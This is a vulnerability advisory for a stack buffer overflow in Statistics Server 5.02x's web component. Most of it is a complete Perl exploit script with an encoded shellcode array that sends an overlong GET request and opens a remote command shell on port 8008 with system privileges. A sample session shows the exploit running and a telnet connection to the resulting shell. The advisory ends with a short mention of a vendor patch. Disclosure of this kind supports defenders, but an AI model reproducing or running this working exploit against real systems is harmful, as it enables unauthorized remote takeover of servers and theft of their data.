|
Vulnerability Statistics Server Affected Statistics Server 5.02x Description '|Zan' and Nemo found following. 'Statistics Server is far more than just another log analyzer. It analyzes Web site traffic in "Real-time" and generates "Live Stats" reports in an easy to use Web interface.' 'The ability of Statistics Server to deliver Live Web statistics for high volume installations has made it an essential component of many corporate Internet and Intranet Web sites and ISP Web hosting installations.' Statistics Server 5.02x ships with a stack overflow in its web component. It *lets run arbitrary code inside* by local/remote user. Tests, ideas & exploits were tested against Win2k/Spanish version and WinNT 4.0/sp6a Spanish version. Web server runs like a system service with a default installation. Web server can't handle long requests correctly. When a long GET (about 2033 bytes) request is made. It dies with EIP overwritten. It lets run arbitrary code with web servers privileges (system privileges by default). Exploit? It spawns a remote winshell on 8008 port. It doesn't kill webserver so webserver continues running while hack is made. When hack is finished webserver will run perfectly too. $ lynx http://vulnerable.com Server Selection Please Enter Server ID _____________ GO .... $ ./ssexploit502x.pl vulnerable.com 80 (c) Deep Zone - Statistics Server 5.02x's exploit Coded by |Zan - izan@deepzone.org -=[ http://www.deepzone.org - http://deepzone.cjb.net ]=- spawning remote shell on port 8008 ... HTTP/1.0 302 Server: Statistics Server 5.0 Location: /_XXXXXXXXX_http://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ... ... ... ... ... ... ... Content-Type: text/html Connection: Keep-Alive Content-Lenght: 0 ... done. $ lynx http://vulnerable.com (It continues working }:) Server Selection Please Enter Server ID _____________ GO .... $ telnet vulnerable.com 8008 Trying vulnerable.com... Connected to vulnerable.com. Escape character is '^]'. Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. D:\StatisticsServer> Exploit works against Win2k/Statistics Server 5.02x running like service. #!/usr/bin/perl -w # Statistics Server 5.02x's exploit. # usage: ./ssexploit502x.pl hostname port # 00/08/10 # http://www.deepzone.org # http://deepzone.cjb.net # http://mareasvivas.cjb.net (|Zan homepage) # # --|Zan <izan@deepzone.org> # -------------------------------------------------------- # # This exploit works against Statistics Server 5.02x/Win2k. # # Tested with Win2k (spanish version). # # It spawns a remote winshell on 8008 port. It doesn't kill # webserver so webserver continues running while hack is made. # When hack is finished webserver will run perfectly too. # # Default installation gives us a remote shell with system # privileges. # # overflow discovered by # -- Nemo <nemo@deepzone.org> # # exploit coded by # -- |Zan <izan@deepzone.org> # # -------------------------------------------------------- use IO::Socket; @crash = ( "\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41", "\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f", "\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04", "\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e", "\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32", "\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99", "\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c", "\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9", "\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71", "\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9", "\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93", "\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99", "\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99", "\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14", "\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17", "\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d", "\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99", "\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66", "\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d", "\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7", "\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9", "\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9", "\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3", "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a", "\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14", "\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87", "\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9", "\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32", "\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99", "\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98", "\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf", "\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99", "\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3", "\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3", "\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99", "\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99", "\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13", "\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9", "\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2", "\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf", "\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a", "\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c", "\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d", "\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9", "\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa", "\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce", "\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99", "\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3", "\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4", "\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07", "\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c", "\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03", "\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a", "\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b", "\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07", "\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97", "\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9", "\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c", "\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9", "\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99", "\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9", "\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66", "\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d", "\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d", "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9", "\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99", "\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce", "\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb", "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a", "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9", "\x99","\xaa","\x50","\xa0","\x14","\x07","\x8d","\xd9","\x99", "\x96","\x1e","\xfe","\x66","\x66","\x66","\xf3","\x99","\xf1", "\x99","\xb9","\x99","\x99","\x09","\x14","\x2c","\x13","\x8d", "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9", "\x99","\x34","\xc9","\x66","\x0c","\xf0","\x8a","\xd9","\x99", "\x10","\x1c","\x03","\x8d","\xd9","\x99","\xf3","\x99","\x14", "\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x14","\x2c", "\x13","\x8d","\xd9","\x99","\x34","\xc9","\x14","\x2c","\xbf", "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3f","\x8a", "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9", "\x99","\xf3","\x99","\x12","\x1c","\x03","\x8d","\xd9","\x99", "\x14","\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x12", "\x1c","\x13","\x8d","\xd9","\x99","\xc9","\x14","\x2c","\xbb", "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3b","\x8a", "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9", "\x99","\x70","\x90","\x67","\x66","\x66","\x14","\x2c","\x0b", "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\xf4","\x8a", "\xd9","\x99","\x14","\x2c","\x0f","\x8d","\xd9","\x99","\x34", "\xc9","\x66","\x0c","\xf4","\x8a","\xd9","\x99","\xf3","\x99", "\x66","\x0c","\x2b","\x8a","\xd9","\x99","\xc8","\xcf","\xf1", "\x6d","\x39","\xdc","\x99","\xc3","\x66","\x8b","\xc9","\xc2", "\xc0","\xce","\xc7","\xc8","\xcf","\xca","\xf1","\xe5","\x38", "\xdc","\x99","\xc3","\x66","\x8b","\xc9","\x35","\x1d","\x59", "\xec","\x62","\xc1","\x32","\xc0","\x7b","\x73","\x5a","\xce", "\xca","\xd6","\xda","\xd2","\xaa","\xab","\x99","\xea","\xf6", "\xfa","\xf2","\xfc","\xed","\x99","\xfb","\xf0","\xf7","\xfd", "\x99","\xf5","\xf0","\xea","\xed","\xfc","\xf7","\x99","\xf8", "\xfa","\xfa","\xfc","\xe9","\xed","\x99","\xea","\xfc","\xf7", "\xfd","\x99","\xeb","\xfc","\xfa","\xef","\x99","\xfa","\xf5", "\xf6","\xea","\xfc","\xea","\xf6","\xfa","\xf2","\xfc","\xed", "\x99","\xd2","\xdc","\xcb","\xd7","\xdc","\xd5","\xaa","\xab", "\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xf0", "\xe9","\xfc","\x99","\xde","\xfc","\xed","\xca","\xed","\xf8", "\xeb","\xed","\xec","\xe9","\xd0","\xf7","\xff","\xf6","\xd8", "\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xeb", "\xf6","\xfa","\xfc","\xea","\xea","\xd8","\x99","\xc9","\xfc", "\xfc","\xf2","\xd7","\xf8","\xf4","\xfc","\xfd","\xc9","\xf0", "\xe9","\xfc","\x99","\xde","\xf5","\xf6","\xfb","\xf8","\xf5", "\xd8","\xf5","\xf5","\xf6","\xfa","\x99","\xcb","\xfc","\xf8", "\xfd","\xdf","\xf0","\xf5","\xfc","\x99","\xce","\xeb","\xf0", "\xed","\xfc","\xdf","\xf0","\xf5","\xfc","\x99","\xca","\xf5", "\xfc","\xfc","\xe9","\x99","\xda","\xf5","\xf6","\xea","\xfc", "\xd1","\xf8","\xf7","\xfd","\xf5","\xfc","\x99","\xdc","\xe1", "\xf0","\xed","\xcd","\xf1","\xeb","\xfc","\xf8","\xfd","\x99", "\x9b","\x99","\x86","\xd1","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x95","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x98","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\xda","\xd4","\xdd","\xb7","\xdc","\xc1","\xdc", "\x99","\x99","\x99","\x99","\x99","\x89","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x90","\x90"); # -------------------------------------------------------- sub pcommands { die "usage: $0 hostname port\n" if (@ARGV != 2); ($host) = shift @ARGV; ($port) = shift @ARGV; } sub show_credits { print "\n\n\t (c) 2000 Deep Zone - Statistics Server 5.02x's"; print "exploit\n\n\t\t Coded by |Zan - izan\@deepzone.org\n"; print "\n\t-=[ http://www.deepzone.org - http://deepzone.cjb"; print ".net ]=-\n\n"; } sub bofit { print "\nspawning remote shell on port 8008 ...\n\n"; $s = IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>"tcp"); if(!$s) { die "error.\n"; } print $s "GET http://O"; foreach $item (@crash) { print $s $item } for ($cont=0; $cont<840;$cont++) { print $s "\x90" } print $s "\x8c\x3e\x1d\x01"; print $s "\r\n\r\n"; while (<$s>) { print } print "... done.\n\n"; } # ----- begin show_credits; pcommands; bofit; # ----- that's all :) Solution MediaHouse has created a 5.03 patch that corrects for the Statistics Server (LiveStats) 5.02x memory overflow bug. Additionally 5.03 addresses a problem in the mail engine in regards to Windows 2000. Log file management and server administration is more robust. Download: http://www.mediahouse.com/statisticsserver/download_trial/dist/ss50.exe